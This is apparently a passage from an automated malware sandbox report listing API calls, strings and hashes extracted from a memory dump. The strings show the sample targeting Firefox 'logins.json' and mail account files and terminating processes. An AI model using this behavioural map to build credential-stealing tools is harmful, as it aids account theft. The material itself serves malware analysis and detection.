GetLastError.KERNEL32(?,?,04A0E66E,?,?,?,00000000,?,?,?), ref: 04A088B1

Part of subcall function 04A0CFA6: RegQueryValueExA.KERNELBASE(?,04A0E66E,00000000,04A0E66E,00000000,04A088E0,00000003,00000000,?,00000000,?,04A0E66E,04A0E66E,?,04A088E0,00000000), ref: 04A0CFDE
Part of subcall function 04A0CFA6: RtlAllocateHeap.NTDLL(00000000,04A088E0), ref: 04A0CFF2
Part of subcall function 04A0CFA6: RegQueryValueExA.ADVAPI32(?,04A0E66E,00000000,04A0E66E,00000000,04A088E0,?,04A088E0,00000000,04A0E66E,?,?,?,04A0E66E,?), ref: 04A0D00C
Part of subcall function 04A0CFA6: RegCloseKey.KERNELBASE(?,?,04A088E0,00000000,04A0E66E,?,?,?,04A0E66E,?,?,?,00000000,?,?,?), ref: 04A0D036

GetSystemTimeAsFileTime.KERNEL32(?,00000000,04A0E66E,?,?,?,04A0E66E,?), ref: 04A088F1
SetWaitableTimer.KERNEL32(00000000,04A0E66E,00000000,00000000,00000000,00000000,?,?,04A0E66E,?), ref: 04A08910
HeapFree.KERNEL32(00000000,04A0E66E,00000000,04A0E66E,?,?,?,04A0E66E,?), ref: 04A08926

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
String ID:
API String ID: 1835239314-0
Opcode ID: a22e1857da8c2a58106118ac04715e2480b3800190a18b7ef165d0f91be39a7a
Instruction ID: 1fd3461b288690e1418f917d81e9cf5be5cf008e960420e6fb253fa8f4cbf26f
Opcode Fuzzy Hash: a22e1857da8c2a58106118ac04715e2480b3800190a18b7ef165d0f91be39a7a
Instruction Fuzzy Hash: B6314171900108FBDF21FF95E889D9FBFB9EB94790B148419F941A3150D338AA40CB65

Uniqueness

Uniqueness Score: -1.00%

Function 049F2B14, Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?), ref: 049F2B53
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 049F2B64
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000,?,?,?,?), ref: 049F2B7F
GetLastError.KERNEL32(?,?,?,?), ref: 049F2B95
HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 049F2BA7
HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 049F2BBC

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
String ID:
API String ID: 1822509305-0
Opcode ID: 0d4ed8019a0656c1633cbdb1eea605dd535e8abbd583a76b1e0db969d49ece4b
Instruction ID: 73fc1d960a59b7dcd92dc8536f08cb368665db81b5289b2ebd2f298caf3a87dd
Opcode Fuzzy Hash: 0d4ed8019a0656c1633cbdb1eea605dd535e8abbd583a76b1e0db969d49ece4b
Instruction Fuzzy Hash: A5115E76501128BFEF225F95DC08CEF7F7EEB557A1F004461FA05A1160C6369A51EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A01007, Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

LoadLibraryA.KERNEL32(6676736D,00000000,?,00000014,?,04A02DF8), ref: 04A01027
GetProcAddress.KERNEL32(00000000,704F4349), ref: 04A01046
GetProcAddress.KERNEL32(00000000,6C434349), ref: 04A0105B
GetProcAddress.KERNEL32(00000000,6E494349), ref: 04A01071
GetProcAddress.KERNEL32(00000000,65474349), ref: 04A01087
GetProcAddress.KERNEL32(00000000,65534349), ref: 04A0109D

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: AddressProc$AllocateHeapLibraryLoad
String ID:
API String ID: 2486251641-0
Opcode ID: ca109fe3dc1672707f3bc21cfa86490eeb467bbeecfdc400c5266c34ed8fca7e
Instruction ID: d01420cfb7bf8e307c38994e9432e9fdd47eee0435d31144efb5cf95dd4d4b85
Opcode Fuzzy Hash: ca109fe3dc1672707f3bc21cfa86490eeb467bbeecfdc400c5266c34ed8fca7e
Instruction Fuzzy Hash: 14115BB26016175FB7219F69EC90D93B3ECEF583503498025B984C7170EB26EC05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 049F2218, Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,00000008,00000000,?,049FB525,049F5FCD,00000000,?,?,?,?,049F1141,?,?), ref: 049F222E
RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 049F2241
lstrcpy.KERNEL32(00000008,?), ref: 049F2263
GetLastError.KERNEL32(049F67BB,00000000,00000000,?,049FB525,049F5FCD,00000000,?,?,?,?,049F1141,?,?), ref: 049F228C
HeapFree.KERNEL32(00000000,00000000,?,049FB525,049F5FCD,00000000,?,?,?,?,049F1141,?,?), ref: 049F22A4
CloseHandle.KERNEL32(00000000,049F67BB,00000000,00000000,?,049FB525,049F5FCD,00000000,?,?,?,?,049F1141,?,?), ref: 049F22AD

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
String ID:
API String ID: 2860611006-0
Opcode ID: 72f8879b26556309af7dfa3aae7a47b2f9e96b7c55d86681887e6426b55f3203
Instruction ID: 42f1e5288c5719a4ffe4badc0666d5f95ac163ecc4c5518f38023f567619af15
Opcode Fuzzy Hash: 72f8879b26556309af7dfa3aae7a47b2f9e96b7c55d86681887e6426b55f3203
Instruction Fuzzy Hash: 15119071601309EFEB149FA8DC889AEBBB8FB503647114979F956D3260D735AD02CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A01C34, Relevance: 9.1, APIs: 6, Instructions: 63stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000E39,00000000,?), ref: 04A01C5C
_strupr.NTDLL ref: 04A01C93
lstrlen.KERNEL32(00000000), ref: 04A01C9B
TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 04A01CD3
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 04A01CDA
GetLastError.KERNEL32 ref: 04A01CE2

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
String ID:
API String ID: 110452925-0
Opcode ID: 41d880ac4e422fb7b6a32b36bd5c7f3b54c5e029fbc19a287cb09fec2e54f244
Instruction ID: 73839a6c59d856ee3444d7d5c6ec0b301c33cb9593fa762218f815bef2bda382
Opcode Fuzzy Hash: 41d880ac4e422fb7b6a32b36bd5c7f3b54c5e029fbc19a287cb09fec2e54f244
Instruction Fuzzy Hash: F111C475100204EBEF11AF65ED88DEE37BCFB98314B108410FD05D20A0DB7AED458B60

Uniqueness

Uniqueness Score: -1.00%

Function 049FA287, Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA299

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC), ref: 049FA2B2
GetCurrentThreadId.KERNEL32 ref: 049FA2BF
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC,00000000), ref: 049FA2CB
GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA2D9
lstrcpy.KERNEL32(00000000), ref: 049FA2FB

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
String ID:
API String ID: 1175089793-0
Opcode ID: 14312b02ba92f4ffde117f0490629769a55aca1061f87f25a2211c8f98587ef7
Instruction ID: dc182706821bd8ba96b33716bd2a13389b200ee29da7bbbfc174db1ea8f80082
Opcode Fuzzy Hash: 14312b02ba92f4ffde117f0490629769a55aca1061f87f25a2211c8f98587ef7
Instruction Fuzzy Hash: 8D016D32A012156BEB215FA59C88E6F7BACDB95B547094025FE05E7110DBB8EC028BB4

Uniqueness

Uniqueness Score: -1.00%

Function 049F9A02, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 049F9A5D
SetLastError.KERNEL32(00000000,?,?,?), ref: 049F9AB1

Strings

vids, xrefs: 049F9ABC

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastmemset
String ID: vids
API String ID: 3276359510-3767230166
Opcode ID: 4d8df9844f013ccd3b135ce651ae861d44dcaeb463ca72ce74f93317f30a3762
Instruction ID: 80d6900f42cb49ed4f2fa90506a214b71212073ec2360daa95bc8788d4398571
Opcode Fuzzy Hash: 4d8df9844f013ccd3b135ce651ae861d44dcaeb463ca72ce74f93317f30a3762
Instruction Fuzzy Hash: 6E8108B1D10229AFDF10DFA4DD80ADDBBB9EF48714F10856AE919E7250D770A941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A031D6, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 117stringCOMMON

Download Yara Rule

APIs

StrRChrA.SHLWAPI(?,00000000,00000023,?), ref: 04A031F0
StrChrA.SHLWAPI(?,0000005C), ref: 04A03217
lstrcpyn.KERNEL32(00000005,?,00000001,00000001), ref: 04A0323D
lstrcpy.KERNEL32(?,Unknown), ref: 04A032DA

Strings

Unknown, xrefs: 04A032CE

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrcpylstrcpyn
String ID: Unknown
API String ID: 4154805583-1654365787
Opcode ID: beb12bc24d16dd6d209ea71fdfd8f200718faf8f8b85a3956cb5586d31d3be28
Instruction ID: f748bde9ffda06b135669b0cff09fe7825384afc80e76bf642b825ab4060ca5e
Opcode Fuzzy Hash: beb12bc24d16dd6d209ea71fdfd8f200718faf8f8b85a3956cb5586d31d3be28
Instruction Fuzzy Hash: B8416C76900258BFEF119FA4DD84DEEBBBCEB19350F0484A6E901E7191D734AE49CB60

Uniqueness

Uniqueness Score: -1.00%

Function 049F650F, Relevance: 8.9, APIs: 7, Instructions: 106stringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,049F7EB7,00000000,?,?,?,049F7EB7,?,?,?,?,?), ref: 049F654D
lstrlen.KERNEL32(049F7EB7,?,?,?,049F7EB7,?,?,?,?,?), ref: 049F655F
memcpy.NTDLL(?,?,?,?,?,?,?), ref: 049F65D3
lstrlen.KERNEL32(049F7EB7,00000000,00000000,?,?,?,049F7EB7,?,?,?,?,?), ref: 049F65E8
lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 049F6601
memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 049F660A
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 049F6618

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrlenmemcpy$FreeLocal
String ID:
API String ID: 1123625124-0
Opcode ID: 07f26c0e2949d98815f3985086d4951c9314d160c5668fbe542566ff3ba939c3
Instruction ID: 7b798ab9cdcb1c0169c9d9f54d145a2961c19d2d3e9c3a45629d5c4bb1ae7ae1
Opcode Fuzzy Hash: 07f26c0e2949d98815f3985086d4951c9314d160c5668fbe542566ff3ba939c3
Instruction Fuzzy Hash: E8310AB280021AAFDF119F65DD458AF3FB9EF142A4B044025FD18A6210E731EE61DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 049F7BC6, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 049F753A: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000100,?,?,?), ref: 049F7548

RtlAllocateHeap.NTDLL(00000000,?), ref: 049F7C27
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 049F7C78

Part of subcall function 049F2815: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,04A0EA24), ref: 049F2855
Part of subcall function 049F2815: GetLastError.KERNEL32 ref: 049F285F
Part of subcall function 049F2815: WaitForSingleObject.KERNEL32(000000C8), ref: 049F2884
Part of subcall function 049F2815: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 049F28A7
Part of subcall function 049F2815: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 049F28CF
Part of subcall function 049F2815: WriteFile.KERNEL32(00000006,00001388,?,?,00000000), ref: 049F28E4
Part of subcall function 049F2815: SetEndOfFile.KERNEL32(00000006), ref: 049F28F1
Part of subcall function 049F2815: CloseHandle.KERNEL32(00000006), ref: 049F2909

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 049F7CAD
HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 049F7CBD

Strings

https://, xrefs: 049F7BD8

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
String ID: https://
API String ID: 4200334623-4275131719
Opcode ID: 0cd2fbd534ec8dba408373cdfd77b2f323919c65fc833472da1c5f04d15cd3ac
Instruction ID: ffa881402250fc1b9ce7e8cddedcf1f854373ce709a41d0505476b36502818f5
Opcode Fuzzy Hash: 0cd2fbd534ec8dba408373cdfd77b2f323919c65fc833472da1c5f04d15cd3ac
Instruction Fuzzy Hash: E0313A76900119FFEB109FA4DC88CAEBBBEEB18354B114069F601D3260D775AE51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 049F1D12, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 04A05570: memcpy.NTDLL(00000000,00000090,00000000,00000000,00000000,00000000,?,?,?,?,00000001,?,0000002C,?), ref: 04A055AC
Part of subcall function 04A05570: memset.NTDLL ref: 04A05628
Part of subcall function 04A05570: memset.NTDLL ref: 04A0563D

RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 049F1D67
lstrcmpi.KERNEL32(00000000,Main), ref: 049F1D87
HeapFree.KERNEL32(00000000,00000000,00000000,?,?), ref: 049F1DCE
HeapFree.KERNEL32(00000000,?,?,?,?), ref: 049F1DDF

Strings

Main, xrefs: 049F1D7F

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Freememset$Allocatelstrcmpimemcpy
String ID: Main
API String ID: 1065503980-521822810
Opcode ID: e6a2171d11eb2b238c8deb5575e09208f16592883b4840108815ea48b47a74b6
Instruction ID: a050b21a7a603b8a6eccc810407f7eb10746cd0ec1d1f22797e3394d616134ad
Opcode Fuzzy Hash: e6a2171d11eb2b238c8deb5575e09208f16592883b4840108815ea48b47a74b6
Instruction Fuzzy Hash: 1F213D75A00209FBEF11AFA5DC85AAE7BB9EB14318F108024EA05E6160D735BE15DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04A10A09, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,00000008,77E49EB0,00000000,?,?,?,00000000,04A0D0A7,?,00000000), ref: 04A10A1A
LoadLibraryA.KERNEL32(NTDSAPI.DLL), ref: 04A10AB4
FreeLibrary.KERNEL32(00000000), ref: 04A10ABF

Strings

NTDSAPI.DLL, xrefs: 04A10AAD
NTDLL.DLL, xrefs: 04A10A15

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Library$FreeHandleLoadModule
String ID: NTDLL.DLL$NTDSAPI.DLL
API String ID: 2140536961-3558519346
Opcode ID: 0f4739737c9846d1b921c5363f01d0ccbac3ff26df9864eb69d5bc1e96b1a03b
Instruction ID: c59464fcfc4abd38ec635e35cd58a5114fbf52a8b9eb9510c9ca4b64fb9f4d75
Opcode Fuzzy Hash: 0f4739737c9846d1b921c5363f01d0ccbac3ff26df9864eb69d5bc1e96b1a03b
Instruction Fuzzy Hash: 7231BF716083028FDB14DF24C444A6ABBE0FF84315F44496EE889D7661E374E989CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 049F6FA6, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 04A08991: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 04A089D6
Part of subcall function 04A08991: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04A089EE
Part of subcall function 04A08991: WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,049F6FC2,04A10454,00000000,00000001), ref: 04A08AB4
Part of subcall function 04A08991: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,049F6FC2,04A10454,00000000,00000001), ref: 04A08ADD
Part of subcall function 04A08991: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,049F6FC2,04A10454,00000000,00000001), ref: 04A08AED
Part of subcall function 04A08991: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,049F6FC2,04A10454,00000000,00000001), ref: 04A08AF6

Part of subcall function 049FA287: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA299
Part of subcall function 049FA287: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC), ref: 049FA2B2
Part of subcall function 049FA287: GetCurrentThreadId.KERNEL32 ref: 049FA2BF
Part of subcall function 049FA287: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC,00000000), ref: 049FA2CB
Part of subcall function 049FA287: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA2D9
Part of subcall function 049FA287: lstrcpy.KERNEL32(00000000), ref: 049FA2FB

Part of subcall function 04A0FBBE: lstrlen.KERNEL32(00001000,.dll,00000000,00000000,049F2A3D,00000000,00000000,00000000,?,04A022AD,04A17334,00001000,.dll,00000000,00001000,00000000), ref: 04A0FBC7
Part of subcall function 04A0FBBE: mbstowcs.NTDLL ref: 04A0FBEE
Part of subcall function 04A0FBBE: memset.NTDLL ref: 04A0FC00

Part of subcall function 04A02A35: RtlFreeHeap.NTDLL(00000000,?,049F10F7,?,?,0000002C,?), ref: 04A02A41

PathFindFileNameW.SHLWAPI(00000000,00000000,00000000,?,000000D3,?,04A10454,00000000,00000001), ref: 049F7004

Part of subcall function 04A0AF0E: lstrlenW.KERNEL32(?,77E61120,?,?,00000250,?,00000000), ref: 04A0AF5A
Part of subcall function 04A0AF0E: lstrlenW.KERNEL32(?,?,00000000), ref: 04A0AF66
Part of subcall function 04A0AF0E: memset.NTDLL ref: 04A0AFAE
Part of subcall function 04A0AF0E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04A0AFC9
Part of subcall function 04A0AF0E: lstrlenW.KERNEL32(0000002C), ref: 04A0B001
Part of subcall function 04A0AF0E: lstrlenW.KERNEL32(?), ref: 04A0B009
Part of subcall function 04A0AF0E: memset.NTDLL ref: 04A0B02C
Part of subcall function 04A0AF0E: wcscpy.NTDLL ref: 04A0B03E

DeleteFileW.KERNEL32(00000001,00000000,*.bin,?,00000000,00000000,00000000,?,000000D3,?,04A10454,00000000,00000001), ref: 049F7039
HeapFree.KERNEL32(00000000,?,?,000000D3,?,04A10454,00000000,00000001), ref: 049F7052
HeapFree.KERNEL32(00000000,?,00000000,*.bin,?,00000000,00000000,00000000,?,000000D3,?,04A10454,00000000,00000001), ref: 049F7065

Strings

*.bin, xrefs: 049F7016

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$FileFreelstrlen$PathTempmemset$AllocateFindNameTime$CloseCurrentDeleteFirstObjectSingleSystemThreadWaitlstrcpymbstowcswcscpy
String ID: *.bin
API String ID: 3311952166-1490590538
Opcode ID: de28bb97ddbf7ef3bf4346659d4247b9ef065b03c1bdf2380d022caf1cabd09a
Instruction ID: 0770bb8e6c00956efe12bc746ec8420958d84c91d4d3bb3c58a06592ee9519c7
Opcode Fuzzy Hash: de28bb97ddbf7ef3bf4346659d4247b9ef065b03c1bdf2380d022caf1cabd09a
Instruction Fuzzy Hash: F9218E71A01324AFDB20EFE5DC88D9FBBBCEF58714B11446AE905E3290D674B901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 049F9796, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 049F97A6

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001), ref: 049F97C8
lstrcpyW.KERNEL32(00000000,?), ref: 049F97F4
lstrcatW.KERNEL32(00000000,\logins.json), ref: 049F9800

Part of subcall function 04A0E7BA: strstr.NTDLL ref: 04A0E875
Part of subcall function 04A0E7BA: strstr.NTDLL ref: 04A0E8BA

Strings

\logins.json, xrefs: 049F97FA

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
String ID: \logins.json
API String ID: 3712611166-2913861366
Opcode ID: 8e2956f177d1731b9af569391f4d46d6ee7bd501136239f6fae6363e7e680e15
Instruction ID: ea7de3b76ca4089e3fee84ee9559873dbe4a1b74db90e4443dfb38c300f329b3
Opcode Fuzzy Hash: 8e2956f177d1731b9af569391f4d46d6ee7bd501136239f6fae6363e7e680e15
Instruction Fuzzy Hash: AC1119B2501119BFEF116FA5DC88EDF7FADEF09264B508064FA0596010DB35EE428BA0

Uniqueness

Uniqueness Score: -1.00%

Function 049FBD9C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,?,?,?,049F6E57,?,?,?,Salt,?,?,?,Store Root,?), ref: 049FBDB0

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

mbstowcs.NTDLL ref: 049FBDCC
lstrlen.KERNEL32(account{*}.oeaccount), ref: 049FBDDA
mbstowcs.NTDLL ref: 049FBDF2

Part of subcall function 04A0AF0E: lstrlenW.KERNEL32(?,77E61120,?,?,00000250,?,00000000), ref: 04A0AF5A
Part of subcall function 04A0AF0E: lstrlenW.KERNEL32(?,?,00000000), ref: 04A0AF66
Part of subcall function 04A0AF0E: memset.NTDLL ref: 04A0AFAE
Part of subcall function 04A0AF0E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04A0AFC9
Part of subcall function 04A0AF0E: lstrlenW.KERNEL32(0000002C), ref: 04A0B001
Part of subcall function 04A0AF0E: lstrlenW.KERNEL32(?), ref: 04A0B009
Part of subcall function 04A0AF0E: memset.NTDLL ref: 04A0B02C
Part of subcall function 04A0AF0E: wcscpy.NTDLL ref: 04A0B03E

Part of subcall function 04A02A35: RtlFreeHeap.NTDLL(00000000,?,049F10F7,?,?,0000002C,?), ref: 04A02A41

Strings

account{*}.oeaccount, xrefs: 049FBDD4, 049FBDD9, 049FBDF0

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
String ID: account{*}.oeaccount
API String ID: 1961997177-4234512180
Opcode ID: b4d5cdb0fbdc22d02a70146957d730ca70d0bacdd0f440f8d5352ce67bfee569
Instruction ID: 2b7671dc1de8ffda25520f573f6dae2870cf2beec88aeb3b9ecca313975eccd2
Opcode Fuzzy Hash: b4d5cdb0fbdc22d02a70146957d730ca70d0bacdd0f440f8d5352ce67bfee569
Instruction Fuzzy Hash: CF01C4B3900208B6EF216BA5DC49F9F7FADEB88318F104065B604A6150EA75FE0187A0

Uniqueness

Uniqueness Score: -1.00%

Function 04A017FE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(04A17360,049FA8A1,?,00000000), ref: 04A01802
GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrRegisterDllNotification,?,00000000), ref: 04A01816
GetProcAddress.KERNEL32(00000000), ref: 04A0181D

Strings

LdrRegisterDllNotification, xrefs: 04A0180C
NTDLL.DLL, xrefs: 04A01811

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID: LdrRegisterDllNotification$NTDLL.DLL
API String ID: 3310240892-3368964806
Opcode ID: 96d37e1b2544f043f82a8e9741d59a13f3f5a3628d90ef7bef4eb00778a54a45
Instruction ID: 1d98f4241d6005ac5dada11ef551d3cd9a54df1d3096fee306b472d3b5067519
Opcode Fuzzy Hash: 96d37e1b2544f043f82a8e9741d59a13f3f5a3628d90ef7bef4eb00778a54a45
Instruction Fuzzy Hash: 74017170241301DFEB649FA5A948B52BBE5FF55304F14C1B9E608CB2B0EB75E906CB10

Uniqueness

Uniqueness Score: -1.00%

Function 04A10C56, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39memorystringCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(04A16FE0,00000000), ref: 04A10C62
RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 04A10C7D
lstrcpy.KERNEL32(00000000,-01), ref: 04A10C9E
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04A10CBF

Part of subcall function 049FCC28: SetEvent.KERNEL32(?,?,049FE64A), ref: 049FCC3D
Part of subcall function 049FCC28: WaitForSingleObject.KERNEL32(?,000000FF,?,?,049FE64A), ref: 049FCC5D
Part of subcall function 049FCC28: CloseHandle.KERNEL32(00000000,?,049FE64A), ref: 049FCC66
Part of subcall function 049FCC28: CloseHandle.KERNEL32(?,?,?,049FE64A), ref: 049FCC70
Part of subcall function 049FCC28: RtlEnterCriticalSection.NTDLL(?), ref: 049FCC78
Part of subcall function 049FCC28: RtlLeaveCriticalSection.NTDLL(?), ref: 049FCC90
Part of subcall function 049FCC28: CloseHandle.KERNEL32(?), ref: 049FCCAC
Part of subcall function 049FCC28: LocalFree.KERNEL32(?), ref: 049FCCB7
Part of subcall function 049FCC28: RtlDeleteCriticalSection.NTDLL(?), ref: 049FCCC1

Strings

-01, xrefs: 04A10C96

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
String ID: -01
API String ID: 1103286547-1095514728
Opcode ID: 737e781cc003cde6fbe01e7bf590fc881e0b331f00af29a31c0a4d2b646ce389
Instruction ID: 728a417a5ab7ce2d67bddb0f20c10ce9e33a9fb42c8b1091cf02ba4b59716f1d
Opcode Fuzzy Hash: 737e781cc003cde6fbe01e7bf590fc881e0b331f00af29a31c0a4d2b646ce389
Instruction Fuzzy Hash: 37F0B43274132077FE312B25AC0EF4B3DA8EBA5B61F054421BA05E61F0E968EC42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04A05751, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,04A03461,00002334,?,?,?,?,049F714A,?), ref: 04A05756
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 04A0576B
wsprintfA.USER32 ref: 04A05780

Part of subcall function 049FC881: memset.NTDLL ref: 049FC896
